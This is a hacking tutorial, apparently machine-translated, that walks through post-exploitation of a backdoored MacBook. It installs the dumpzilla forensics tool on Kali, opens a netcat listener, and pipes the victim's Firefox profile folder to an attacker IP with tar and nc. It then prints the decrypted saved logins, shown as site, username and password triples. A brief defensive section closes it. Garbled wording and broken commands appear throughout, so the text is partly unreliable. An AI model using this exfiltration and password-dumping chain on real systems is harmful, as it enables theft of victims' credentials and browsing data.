Passwords and data stored in web browsers are extremely valuable to hackers. If you do not make any financial gains, Black Hat hackers can still pass your passwords and personal information on for amusement. Never underestimate what you are worth to a hacker.
Although I'm definitely not in the dark, it was an interesting experience discovering fun methods to conduct post-exploit attacks from a backdoor of the MacBook. So far, I've been surprised to learn how easy it is to misuse tools built into MacOS or install third-party software to reuse a Mac computer.
With this hacking macOS journey, I'll continue this time showing how hackers can easily extract sensitive Firefox directories and extract passwords with dumpzilla, a comprehensive browser forensics tool. While Black Hats could benefit from this knowledge, White Hats, Pentesters and other good-mood hackers will join in as well. In addition, ordinary Mac users will learn how everyday practices such as storing passwords in browsers can endanger them.
Readers should be aware that this attack was performed by a low privilege backdoor (no admin access) against Firefox 60 on macOS 1
To start from the potash system, install some packages with pip . Pip is a package management system for installing and managing Python packages. These packages have to execute dumpzilla. The complete command is pip install logging lz4 .
pip install logging lz4 Collect logging Download from https://files.pythonhosted.org/packages/93/4b/979db9e44be09f71e85c9c8cfc42f258adfb7d93ce01deed2788b2948919/logging-0.4.9.6.tar.gz (96kB) 100% | ████████████████████████████████ | 102 kB 69 kB / s Building wheels for the collected packages: logging Running setup.py bdist_wheel to log ... is done In the directory: /root/.cache/pip/wheels/7d/2e/cb/a51fbdf351b2efebcf857f8b2c8d59b6ccd44ea2e9bb4005d6 stored Successful logging Install Collected Packages: Logging Logging 0.4.9.6 was successfully installed
There are more dependencies that I found easier to install with APT. Enter apt-get install python3 sqlite3 python-lz4 libnss3 * .
apt-get install python3 sqlite3 python-lz4 libnss3 * Read package lists ... Done Create dependency structure Read status information ... Done Recommended packages: sqlite3-doc The following NEW packages will be installed: python-lz4 sqlite3 0 updated, 2 reinstalled, 0 removed and 274 not updated. Need 879 kB of archives. After this operation, 2,591 KB of additional space will be allocated. Get: 1 https://mirrors.dotsrc.org/kali kali-rolling / mainamd64 Python-lz4 amd64 0.10.1 + dfsg1-0.2 [16.6 kB] Getting: 2 https://mirrors.dotsrc.org/kali kali-rolling / main amd64 sqlite3 amd64 3.23.1-1 [863 kB] Achieved 879 kb in 15s (60.0 kB / s) Select the previously unselected package python-lz4. (Read database ... 181720 files and directories are currently installed.) Prepare Unpacking ... / python-lz4_0.10.1 + dfsg1-0.2_amd64.deb ... Unpack Python-lz4 (0.10.1 + dfsg1-0.2) ... Selecting the previously unselected sqlite3 package. Preparation for unpacking ... / sqlite3_3.23.1-1_amd64.deb ... Unpack Sqlite3 (3.23.1-1) ... Set up Python lz4 (0.10.1 + dfsg1-0.2) ... Set up Sqlite3 (3.23.1-1) ... Processing triggers for man-db (2.8.3-2) ...
Step 2: Downloading dumpzilla
With the necessary packages, it is now safe to download dumpzilla.
Now, at the time of writing In the latest version of dumpzilla, there is an error that causes the passwords stored in Firefox to be decoded automatically. Fortunately, GitHub stores a history of each version that users can access at any time.
In future versions of dumpzilla, it should be possible to simply clone the repository and continue with this article. For the moment, readers should download this version of dumpzilla with the following command wget . This version has been tested and decrypts the passwords saved in Firefox as expected.
wget # https: //github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip'
Wget creates a new file b3075d1960874ce82ea76a5be9f58602afb61c39.zip. The compressed dumpzilla files contained therein can be extracted with the command unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip
unpack b3075d1960874ce82ea76a5be9f58602afb61c39.zip Archive: b3075d1960874ce82ea76a5be9f58602afb61c39.zip b3075d1960874ce82ea76a5be9f58602afb61c39 Create: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / Create: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / addinfo.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / addons.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / bookmarks.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / cert_override.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / cookies.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / downloads_dir.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / downloads_history.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / exceptions.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / extensions.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / forms.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / history.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / offlinecache.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / passwords.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / permissions.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / session.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / thumbnails.json Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / README.md Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / dumpzilla Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / dumpzilla.py
After extracting dumpzilla, go to the newly created directory "dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 /" with the command cd .
cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 /
Step 4: Increase the File Permissions
Then use the command chmod to make sure that the dumpzilla.py file has permission to run in Kali.
chmod + x dumpzilla.py
Step 5: Start the Netcat Listener
Use dumpzilla all setup to start a Netcat Listener to get the Firefox directories sent by the Backdoored MacBook.
nc -l -p 9999 | tar x
This command instructs Netcat on port ( -p ) 9999 and pipe ( | ) the incoming data in the tar command , Tar is a command-line archiving utility available in both Kali and macOS. The x executing the command tar automatically says extract and stores the data (the compressed directories) that come from the netcat pipe. Directories are compressed during the Netcat transfer for Netcat to handle the data more easily.
To download dumpzilla and configure Netcat to receive the Firefox data. Next, I'll show you how to exfiltrate complete Firefox directories from the Backdoored MacBook.
Step 6: Exfiltrate Backdoored MacBook Directories
Some readers are aware of Firefox's ability to manage multiple profiles. The profiles are typically used by computer-experienced users who need to isolate their work, school, and personal browsing history, bookmarks, and cookies.
In general, most Firefox users have a "default" profile. MacOS has profiles in the lower directory.
/ User /
/ Library / Application Support / Firefox / Profiles /
For example, if Bob's MacBook is compromised with a fake PDF while logged in to his account, the attacker will not be able to see other Firefox profiles on the MacBook that are not part of Bob. At least not without a privilege escalation – which would be beyond the scope of this article.
On the other hand, if the target MacBook was physically regressed, the attacker would probably have full root access (Administrator) to all accounts and Firefox profiles
Based on the intent to spend only the Firefox profile on a single account , connect to the Backdoored MacBook for these next commands.
Change to the desired profile / directory with cd
cd & # 39; / user /
/ Library / Application Support / Firefox / & # 39;
Then use the following command tar to compress the cf ) profiles / directory (and all contents) and directly ( | ) the data in the Netcat ( nc ) command. The attacker's system and IP address are represented as 220.127.116.11 so be sure to change the IP address to the VPS or local IP address used by the attacker.
tar cf - Profiles / | nc 18.104.22.168 9999
While Netcat is transferring the directory, the terminals seem to have frozen or stopped. It took about two minutes for the transfer to complete when a Firefox profile was converted to exfiltrating with just 12 hours of stored data. I imagine a Firefox profile with a month-long browser history, months of browser cookies and hundreds of bookmarks could take a lot of time. Be patient here. If any of the data in the directories becomes corrupted when exfiltrated into the Kali system, the passwords stored in the Firefox profiles may not be decodable.
Back on the potash machine, there will be a new profile / directory. There will be at least one directory after the naming scheme xxxxxxxx.default / . By default, Firefox automatically generates eight random characters ( xxxxxxxx ) and prefixes them with the profile name. For example, users with multiple profiles can have directories named "w9wuahzu.work/", "ei49j03w.personal /" and "r3h84t9t.default". Each directory can be individually processed with dumpzilla.
To extract passwords from a specific Firefox profile, use the command python3 dumpzilla.py Profiles / xxxxxxxxfault / –Passwords .
python3 dumpzilla .py profiles / xxxxxxxx.default / --passwords ============================================= ======================================= == ======= == decode passwords ============================================= ======================================= == ====== => Source file: /tmp/dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/9kwbffy3.default/logins.json => SHA256 hash: 9df5b2c418bbb967e63b556162e6d11ed509a9a5c67580f3c79e089d954ade91 Web: https://www.facebook.com Username: firstname.lastname@example.org Password: DarkDante23 Web: https://accounts.google.com Username: kevin.poulsen Password: Porsche944 Web: https://www.reddit.com Username: email@example.com Password: DarkDante23 Web: https://www.amazon.com Username: firstname.lastname@example.org Password: DarkDante944 Web: https://login.live.com Username: email@example.com Password: DarkDante123 Web: https://www.netflix.com Username: firstname.lastname@example.org Password: Porsche944 Web: https://login.aliexpress.com Username: Poulsen Password: Jordan626 ============================================= ======================================= == ========= == total information ============================================= ======================================= == ======== Total Decode Passwords: 7 Total Passwords: 7
How to Protect Against Web Browser Attacks
Do not let this article stop you from using Firefox, or pretend that Google Chrome is more secure. Google Chrome is just as vulnerable to the actions described in this article. Instead of seeking protection in web browsers, you should make minor behavioral changes to make such attacks harder for hackers.
- Use Private Browser Mode . Dumpzilla can do much more than just extract passwords from Firefox. It is safer to use the private browser mode to 100%. Although it can be annoying and makes surfing the Internet painful, it is quite dangerous to entrust so much data to the web browsers. Browser data dumps with dozens of email addresses and passwords are freely shared in Black Hat hacking communities. If hackers do not sell your data, they'll wreak havoc on your accounts because they're of no financial value to them.
- Use a master password. If storing passwords in Firefox is a convenience you do not want to give up, use a strong master password. This will provide hackers with a modest obstacle and prevent them from learning all their passwords.
- Use a suitable password manager . Password managers provide improved protection of stored passwords. Hackers can still extort and perform brute force attacks against the password manager's database, but with a strong and unique password, the attacker must spend weeks (or months) trying to crack the encrypted database.
Do not miss: How To Manage Your Passwords With KeePassX In MacOS